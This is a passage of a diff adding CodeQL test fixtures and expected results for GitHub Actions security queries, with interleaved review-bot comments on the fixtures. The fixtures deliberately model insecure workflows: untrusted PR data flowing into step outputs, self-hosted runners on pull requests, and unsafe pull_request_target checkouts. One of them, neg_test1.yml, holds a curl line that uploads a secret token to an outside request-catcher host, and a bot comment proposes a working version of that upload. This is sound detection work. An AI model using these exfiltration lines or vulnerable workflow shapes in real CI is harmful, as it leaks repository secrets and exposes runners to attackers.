.github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | 
steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | 
CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] 
| +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | 
steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| 
.github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | semmle.label | Job outputs node [chart-version] | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | semmle.label | steps.get-version.outputs.chart_version | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | +| .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$( + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected new file mode 100644 index 000000000000..259746eaec9a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 000000000000..cd179c0f1e6b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + 
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
new file mode 100644
index 000000000000..f000ad6a287a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
@@ -0,0 +1,10 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
new file mode 100644
index 000000000000..6f7844f17cb2
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
@@ -0,0 +1,16 @@
+on:
+ pull_request
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ test:
+ name: Build and test
+ runs-on: ubuntu-latest
+ permissions: {}
+ steps:
+ - uses: actions/checkout@v2
+
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml
new file mode 100644
index 000000000000..b34dfeec641c
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml
@@ -0,0 +1,13 @@
+on:
+ pull_request
+
+permissions: {}
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml
new file mode 100644
index 000000000000..16930cfb07c8
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml
@@ -0,0 +1,11 @@
+on:
+ workflow_call:
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+
+
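Review bot: perms4.yml is the one fixture that is not reported even though neither the workflow nor the `build` job sets `permissions`, and nothing in the file says why; the only visible difference from perms5.yml is that its sole trigger is `workflow_call`, so the query presumably treats a reusable workflow as inheriting the caller's token permissions. A header comment would make that intent checkable: `# NOT VULNERABLE: workflow_call only - the GITHUB_TOKEN permissions come from the calling workflow`. The fixture set also has no case where a job sets a non-empty map such as a job-level `permissions: { contents: read }`, which is the shape most real workflows use; a perms6.yml with that shape would confirm the query does not report it.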
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 000000000000..4353c2804976 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected new file mode 100644 index 000000000000..8f94d0dc45a6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -0,0 +1,3 @@ +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref new file mode 100644 index 000000000000..ad1c6a996609 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -0,0 +1,2 @@ +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 000000000000..37eb2bddb58c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml 
@@ -0,0 +1,94 @@
+name: test
+
+on:
+ pull_request:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, X64, Linux, 16c32g]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, label-1]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'linux'
+ - 'x64'
+ - 'metal'
+ steps:
+ - run: echo "foo"
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
+ test5:
+ strategy:
+ fail-fast: false
+ matrix:
+ platform:
+ - name: Linux
+ os: ubuntu-latest
+ shell: bash
+ - name: macOS
+ os: macos-latest
+ shell: bash
+ - name: Windows
+ os: windows-latest
+ shell: cmd
+ node-version:
+ - 16.14.0
+ - 16.x
+ - 18.0.0
+ - 18.x
+ - 20.x
+ runs-on: ${{ matrix.platform.os }}
+ steps:
+ - run: cmd
+ test6:
+ strategy:
+ matrix:
+ os: [ubuntu-latest, macos-latest]
+ runs-on: ${{ matrix.os }}
+ steps:
+ - run: cmd
+ test7:
+ strategy:
+ matrix:
+ os: [self-hosted, ubuntu-latest]
+ runs-on: ${{ matrix.os }}
+ steps:
+ - run: cmd
+ test8:
+ strategy:
+ matrix:
+ settings:
+ - host:
+ - 'self-hosted'
+ - 'macos'
+ - 'arm64'
+ target: 'x86_64-apple-darwin'
+ runs-on: ${{ matrix.settings.host }}
+ steps:
+ - run: cmd
+ test9:
+ strategy:
+ matrix:
+ os: ${{ github.repository }}
+ runs-on: ${{ matrix.os }}
+ steps:
+ - run: cmd
+ test10:
+ strategy:
+ matrix:
+ os: ${{ github.repository }}
+ foo:
+ - bar: ${{ github.repository }}
+ baz: "asdf"
+ runs-on: ${{ matrix.foo.bar }}
+ steps:
+ - run: cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
new file mode 100644
index 000000000000..243bac925994
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
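Review bot: Only test5 and test6 are meant to stay unreported in this file (the expected output lists every other job), but unlike secrets-in-artifacts.yml in the same commit the jobs carry no `# VULNERABLE` / `# NOT VULNERABLE` markers, so a reader has to cross-check the .expected file to learn which outcome each case encodes. Marking each job, e.g. `test5: # NOT VULNERABLE - every matrix os is GitHub-hosted` and `test9: # VULNERABLE - runs-on cannot be resolved statically`, keeps the fixture self-describing. test4's `runs-on: self-hosted-azure` is a single custom label rather than the `self-hosted` label and is still reported, which looks like a substring match; a comment saying that is intentional would stop the next maintainer from "fixing" it.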
@@ -0,0 +1,26 @@
+name: test
+
+on:
+ push:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'foo'
+ steps:
+ - run: cmd
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
new file mode 100644
index 000000000000..306bed9baec1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
@@ -0,0 +1,8 @@
+| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner |
diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
new file mode 100644
index 000000000000..43692e5ce43a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
@@ -0,0 +1,2 @@
+Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
+
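Review bot: test2.yml repeats the four self-hosted shapes from test1.yml under `on: push` and is absent from the expected output, so it is the negative fixture, yet nothing in the file states that the trigger is the reason. A header comment would record the contract the query relies on: `# NOT VULNERABLE: push never runs for fork pull requests, so no untrusted code reaches the runner`. A further fixture that lists `push` and `pull_request` together in one `on:` block would also pin down that a single externally-triggerable event is enough for the job to be reported.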
diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
new file mode 100644
index 000000000000..48833460b44b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
@@ -0,0 +1,20 @@
+name: Pull request feedback
+
+on:
+ pull_request_target:
+ types: [ opened, synchronize ]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v3
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
new file mode 100644
index 000000000000..be6a6cf39395
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
@@ -0,0 +1,20 @@
+name: Pull request feedback
+
+on:
+ pull_request_target:
+ types: [ labeled ]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v3
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected
new file mode 100644
index 000000000000..92f87dc1f35b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected
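Review bot: test2.yml is not reported (only test1.yml appears in the expected output), but it still checks out `${{ github.event.pull_request.head.ref }}`, a branch name the PR author can push to after the `labeled` event that started the run, so the code that reaches the runner is not necessarily the code that carried the label. If the query deliberately accepts a `labeled`-only trigger as a sufficient authorization gate, a comment in the fixture should say so; otherwise the safe negative is the one that pins `ref: ${{ github.event.pull_request.head.sha }}`, and both shapes deserve their own fixture so the ref/sha distinction is tested explicitly. In both files the `if:` guard sits on the checkout step only, so the following `./cmd` step runs whether or not the label is present; a comment noting that it is a step-level gate, not a job-level one, would avoid misreading.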
@@ -0,0 +1 @@
+| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') |
diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
new file mode 100644
index 000000000000..09a19f21e3cb
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
@@ -0,0 +1,2 @@
+Security/CWE-285/ImproperAccessControl.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
new file mode 100644
index 000000000000..80f98bd57afc
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
@@ -0,0 +1,19 @@
+name: secrets
+on:
+ workflow_dispatch:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ secrets.TOKEN }}' > secrets.txt
+ curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
+ - env:
+ A_SECRET: ${{ secrets.TOKEN }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets['TOKEN'] }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets["TOKEN"] }}
+ run: echo "$A_SECRET"
diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
new file mode 100644
index 000000000000..473d59986957
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
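Review bot: The `curl -X PUT -T ./secrets.txt -H http://...sink.reqsink.com` line in neg_test1.yml (repeated in test1.yml of this directory) is not a working request: `-H` consumes the URL as a header value and no target URL is left, so the fixture does not actually model the upload it is meant to illustrate. The queries only parse the script, so the test verdicts are unaffected, but a fixture that reads as real exfiltration is more useful to the next reader: `curl -X PUT -T ./secrets.txt http://sink.example.test/`. Using a reserved example hostname instead of a live request-catcher domain also avoids shipping a real third-party endpoint in the test corpus.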
@@ -0,0 +1,87 @@
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ test1: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: .
+ test2: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@v4
+ with:
+ name: file
+ path: .
+ test3: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: "*"
+ test4: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: foo
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo
+ test5: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: foo
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo/*
+ test6: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: pr
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo
+ test7: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: .
+ test8: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: true
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: .
+
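Review bot: test1 and test2 are identical except for the `uses:` reference (`@1746f4ab... # v4.3.2` versus `@v4`) and only test1 is reported, so the version of actions/upload-artifact is load-bearing for this query; presumably the floating `v4` tag is taken to resolve to a release that no longer uploads hidden files such as the `.git` directory where `actions/checkout` persists the token, while the pinned 4.3.2 commit predates that change. None of that is stated in the file, and `# NOT VULNERABLE` on its own will read as a mistake to anyone who notices the two jobs upload the same path with the same checkout. Suggest `test2: # NOT VULNERABLE: unpinned v4 resolves to a release that skips hidden files (.git) by default`, plus a further positive fixture using `uses: actions/upload-artifact@v4` together with `include-hidden-files: true`, since that input restores the exposure on the newer releases.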
